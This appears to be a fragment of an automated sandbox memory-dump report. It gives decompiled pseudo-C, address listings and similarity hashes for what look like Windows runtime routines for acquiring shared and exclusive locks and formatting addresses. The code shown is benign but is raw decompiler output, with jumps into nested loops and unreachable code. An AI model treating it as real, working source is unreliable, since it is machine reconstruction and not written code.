                                    0x0079eaa0
                                    0x00000000

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: __fassign
                                    • String ID: .$:$:
                                    • API String ID: 3965848254-2308638275
                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                    • Instruction ID: d5d01b3d71e993e05c5a94f67dae0f804c7ecfa9f38d3ef88ee363e3ccdcc407
                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                    • Instruction Fuzzy Hash: 79A19D7190030AEFCF25CF64C8556FEB7B4AF15384F24C56AD84AA7282D6389A41CBE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00770554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 49%
                                    			E00770554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x008101c0;
									_push(_t144);
									_push(0);
									_t51 = E0072F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00774FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00783F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00783F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E007B217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00783F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00773915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x008101c0;
												_push(_t138);
												_push(0);
												_t58 = E0072F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00774FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00783F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00783F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E007B217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00783F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00773915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00755384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0072F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00773915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0072F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00773915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0072F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00773915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E00755329(_t110, _t138);
																return E007553A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}



































                                    0x0077055a
                                    0x0077055d
                                    0x00770563
                                    0x00770566
                                    0x007705d8
                                    0x007705e2
                                    0x007705e5
                                    0x00000000
                                    0x007705e7
                                    0x007705e7
                                    0x007705ea
                                    0x007705f3
                                    0x007705f3
                                    0x00770568
                                    0x00770568
                                    0x00770568
                                    0x00770569
                                    0x00770569
                                    0x00770569
                                    0x0077056b
                                    0x00000000
                                    0x00000000
                                    0x0079217f
                                    0x00792183
                                    0x0079225b
                                    0x0079225f
                                    0x00792189
                                    0x0079218c
                                    0x0079218f
                                    0x00792194
                                    0x00792199
                                    0x0079219d
                                    0x007921a0
                                    0x007921a2
                                    0x007921ce
                                    0x007921ce
                                    0x007921ce
                                    0x007921d0
                                    0x007921d6
                                    0x007921de
                                    0x007921e2
                                    0x007921e8
                                    0x007921e9
                                    0x007921ec
                                    0x007921f1
                                    0x007921f6
                                    0x00000000
                                    0x00000000
                                    0x007921f8
                                    0x007921fb
                                    0x00792206
                                    0x0079220b
                                    0x0079220c
                                    0x00792217
                                    0x00792226
                                    0x0079222b
                                    0x0079222c
                                    0x0079222f
                                    0x00792232
                                    0x00792235
                                    0x00792235
                                    0x0079223a
                                    0x0079223f
                                    0x00792241
                                    0x00792243
                                    0x00792248
                                    0x00792248
                                    0x0079224d
                                    0x0079224f
                                    0x00792262
                                    0x00792263
                                    0x00792268
                                    0x00792269
                                    0x00792269
                                    0x00792269
                                    0x0079226d
                                    0x00000000
                                    0x00000000
                                    0x00792276
                                    0x00792279
                                    0x0079227e
                                    0x00792283
                                    0x00792287
                                    0x0079228a
                                    0x0079228d
                                    0x0079228f
                                    0x007922bc
                                    0x007922bc
                                    0x007922bc
                                    0x007922be
                                    0x007922c4
                                    0x007922cc
                                    0x007922d0
                                    0x007922d6
                                    0x007922d7
                                    0x007922da
                                    0x007922df
                                    0x007922e4
                                    0x00000000
                                    0x00000000
                                    0x007922e6
                                    0x007922e9
                                    0x007922f4
                                    0x007922f9
                                    0x007922fa
                                    0x00792305
                                    0x00792314
                                    0x00792319
                                    0x0079231a
                                    0x0079231d
                                    0x00792320
                                    0x00792323
                                    0x00792323
                                    0x00792328
                                    0x0079232d
                                    0x0079232f
                                    0x00792331
                                    0x00792336
                                    0x00792336
                                    0x0079233b
                                    0x0079233d
                                    0x00792350
                                    0x00792351
                                    0x00792356
                                    0x00792359
                                    0x00792359
                                    0x0079235b
                                    0x0079235d
                                    0x00755367
                                    0x0075536b
                                    0x00755372
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00792363
                                    0x00792363
                                    0x00792369
                                    0x0079236a
                                    0x0079236c
                                    0x00792371
                                    0x00792373
                                    0x00000000
                                    0x00792379
                                    0x00792379
                                    0x0079237a
                                    0x0079237f
                                    0x0079237f
                                    0x00792385
                                    0x00792386
                                    0x00792389
                                    0x0079238e
                                    0x00792390
                                    0x00755378
                                    0x0075537c
                                    0x00792396
                                    0x00792396
                                    0x00792397
                                    0x0079239c
                                    0x007923a2
                                    0x007923a3
                                    0x007923a6
                                    0x007923ab
                                    0x007923ad
                                    0x00000000
                                    0x007923b3
                                    0x007923b3
                                    0x007923b4
                                    0x007923b9
                                    0x007923ba
                                    0x007923ba
                                    0x007923bc
                                    0x007923bf
                                    0x00000000
                                    0x00000000
                                    0x00789153
                                    0x00789158
                                    0x0078915a
                                    0x0078915e
                                    0x00789160
                                    0x00000000
                                    0x00789166
                                    0x00789166
                                    0x00789171
                                    0x00789176
                                    0x00789176
                                    0x00000000
                                    0x00789160
                                    0x007923c6
                                    0x007923d7
                                    0x007923d7
                                    0x007923ad
                                    0x00792390
                                    0x00792373
                                    0x0079233f
                                    0x0079233f
                                    0x00000000
                                    0x0079233f
                                    0x00792291
                                    0x00792291
                                    0x00792293
                                    0x00792295
                                    0x0079229a
                                    0x007922a1
                                    0x007922a3
                                    0x007922a7
                                    0x007922a9
                                    0x00000000
                                    0x00000000
                                    0x007922ab
                                    0x007922ad
                                    0x007922af
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x007922af
                                    0x007922b1
                                    0x007922b4
                                    0x007922b4
                                    0x007922b6
                                    0x007553be
                                    0x007553be
                                    0x007553be
                                    0x007553c0
                                    0x00000000
                                    0x00000000
                                    0x007553cb
                                    0x007553ce
                                    0x007553d0
                                    0x007553d4
                                    0x007553d6
                                    0x00000000
                                    0x007553d8
                                    0x007553e3
                                    0x007553ea
                                    0x007553ea
                                    0x00000000
                                    0x007553d6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x007922b6
                                    0x00000000
                                    0x0079228f
                                    0x00792349
                                    0x0079234d
                                    0x00792251
                                    0x00792251
                                    0x00000000
                                    0x00792251
                                    0x007921a4
                                    0x007921a4
                                    0x007921a6
                                    0x007921a8
                                    0x007921ac
                                    0x007921b6
                                    0x007921b8
                                    0x007921bc
                                    0x007921be
                                    0x00000000
                                    0x00000000
                                    0x007921c0
                                    0x007921c2
                                    0x007921c4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x007921c4
                                    0x007921c6
                                    0x007921c6
                                    0x007921c8
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x007921c8
                                    0x007921a2
                                    0x00000000
                                    0x00792183
                                    0x0077057b
                                    0x0077057d
                                    0x00770581
                                    0x00770583
                                    0x00792178
                                    0x00000000
                                    0x00770589
                                    0x0077058f
                                    0x0077058f
                                    0x00770583
                                    0x00000000

                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00792206
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                    • API String ID: 885266447-4236105082
                                    • Opcode ID: ea8b125d9ef6c6a1f81b7a30b86e1f31ecab890a4025023f15d43038b9ceb4d1
                                    • Instruction ID: fbe174005d69523103c40687462872883b2a849454bbf419938160b7b3bbf122
                                    • Opcode Fuzzy Hash: ea8b125d9ef6c6a1f81b7a30b86e1f31ecab890a4025023f15d43038b9ceb4d1
                                    • Instruction Fuzzy Hash: AD514B75740205BBEF14EB18DC85FA673A9AF94710F218229FD48DB287D969EC4287D0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 007714C0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 64%
                                    			E007714C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x812088; // 0x777d6234
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00767707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E007713CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00767707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00767707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00732340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0073E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                    0x007714c0
                                    0x007714cb
                                    0x007714d2
                                    0x007714d6
                                    0x007714da
                                    0x007714de
                                    0x007714e3
                                    0x0077157a
                                    0x0077157a
                                    0x007714f1
                                    0x007714f3
                                    0x0079ea0f
                                    0x00000000
                                    0x0079ea15
                                    0x00000000
                                    0x0079ea15
                                    0x007714f9
                                    0x007714f9
                                    0x007714fe
                                    0x00771504
                                    0x0079ea1a
                                    0x0079ea1f
                                    0x0079ea21
                                    0x0079ea22
                                    0x0079ea27
                                    0x0079ea2a
                                    0x0079ea2a
                                    0x00771515
                                    0x00771517
                                    0x0077156d
                                    0x00771572
                                    0x00771575
                                    0x00771575
                                    0x0077151e
                                    0x0079ea50
                                    0x0079ea55
                                    0x0079ea58
                                    0x0079ea58
                                    0x0077152e
                                    0x00771531
                                    0x00771533
                                    0x00000000
                                    0x00771535
                                    0x00771541
                                    0x00771549
                                    0x00771549
                                    0x00771533
                                    0x007714f3
                                    0x00771559

                                    APIs
                                    • ___swprintf_l.LIBCMT ref: 0079EA22
                                      • Part of subcall function 007713CB: ___swprintf_l.LIBCMT ref: 0077146B
                                      • Part of subcall function 007713CB: ___swprintf_l.LIBCMT ref: 00771490
                                    • ___swprintf_l.LIBCMT ref: 0077156D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp Download File
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: %%%u$4b}w$]:%u
                                    • API String ID: 48624451-3920738116
                                    • Opcode ID: c95d9cebe4ec59ca1efadec51e05ad87c3db3f5432c1afbd5dbe1d25774b1219
                                    • Instruction ID: d3a778ee60efaa949fd91bc014b9dfe59e3c424b9fb95e479ac8a1f065700a8e
                                    • Opcode Fuzzy Hash: c95d9cebe4ec59ca1efadec51e05ad87c3db3f5432c1afbd5dbe1d25774b1219
                                    • Instruction Fuzzy Hash: F721C1B29006199BDF24DE68DC45AEE73ACEB50740F848151FD4AD3141EB78AA688BE0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 007553A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 44%
                                    			E007553A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x008101c0;
									_push(_t92);
									_push(0);
									_t37 = E0072F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00774FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00783F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00783F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E007B217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00783F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00773915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00755384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0072F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00773915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0072F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00773915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0072F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00773915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E00755329(_t74, _t92);
													_push(1);
													return E007553A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

























                                    0x007553ab
                                    0x007553ae
                                    0x007553b1
                                    0x007553b4
                                    0x007553b7
                                    0x007705b6
                                    0x007705c0
                                    0x007705c3
                                    0x00000000
                                    0x007705c9
                                    0x007705c9
                                    0x007705cc
                                    0x007705d5
                                    0x007705d5
                                    0x007553bd
                                    0x007553bd
                                    0x007553bd
                                    0x007553be
                                    0x007553be
                                    0x007553be
                                    0x007553c0
                                    0x00000000
                                    0x00000000
                                    0x00792269
                                    0x0079226d
                                    0x00792349
                                    0x0079234d
                                    0x00792273
                                    0x00792276
                                    0x00792279
                                    0x0079227e
                                    0x00792283
                                    0x00792287
                                    0x0079228a
                                    0x0079228d
                                    0x0079228f
                                    0x007922bc
                                    0x007922bc
                                    0x007922bc
                                    0x007922be
                                    0x007922c4
                                    0x007922cc
                                    0x007922d0
                                    0x007922d6
                                    0x007922d7
                                    0x007922da
                                    0x007922df
                                    0x007922e4
                                    0x00000000
                                    0x00000000
                                    0x007922e6
                                    0x007922e9
                                    0x007922f4
                                    0x007922f9
                                    0x007922fa
                                    0x00792305
                                    0x00792314
                                    0x00792319
                                    0x0079231a
                                    0x0079231d
                                    0x00792320
                                    0x00792323
                                    0x00792323
                                    0x00792328
                                    0x0079232d
                                    0x0079232f
                                    0x00792331
                                    0x00792336
                                    0x00792336
                                    0x0079233b
                                    0x0079233d
                                    0x00792350
                                    0x00792351
                                    0x00792356
                                    0x00792359
                                    0x00792359
                                    0x0079235b
                                    0x0079235d
                                    0x00755367
                                    0x0075536b
                                    0x00755372
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00792363
                                    0x00792363
                                    0x00792369
                                    0x0079236a
                                    0x0079236c
                                    0x00792371
                                    0x00792373
                                    0x00000000
                                    0x00792379
                                    0x00792379
                                    0x0079237a
                                    0x0079237f
                                    0x0079237f
                                    0x00792385
                                    0x00792386
                                    0x00792389
                                    0x0079238e
                                    0x00792390
                                    0x00755378
                                    0x0075537c
                                    0x00792396
                                    0x00792396
                                    0x00792397
                                    0x0079239c
                                    0x007923a2
                                    0x007923a3
                                    0x007923a6
                                    0x007923ab
                                    0x007923ad
                                    0x00000000
                                    0x007923b3
                                    0x007923b3
                                    0x007923b4
                                    0x007923b9
                                    0x007923ba
                                    0x007923ba
                                    0x007923bc
                                    0x007923bf
                                    0x00000000
                                    0x00000000
                                    0x00789153
                                    0x00789158
                                    0x0078915a
                                    0x0078915e
                                    0x00789160
                                    0x00000000
                                    0x00789166
                                    0x00789166
                                    0x00789171
                                    0x00789176
                                    0x00789176
                                    0x00000000
                                    0x00789160
                                    0x007923c6
                                    0x007923cb
                                    0x007923d7
                                    0x007923d7
                                    0x007923ad
                                    0x00792390
                                    0x00792373
                                    0x0079233f
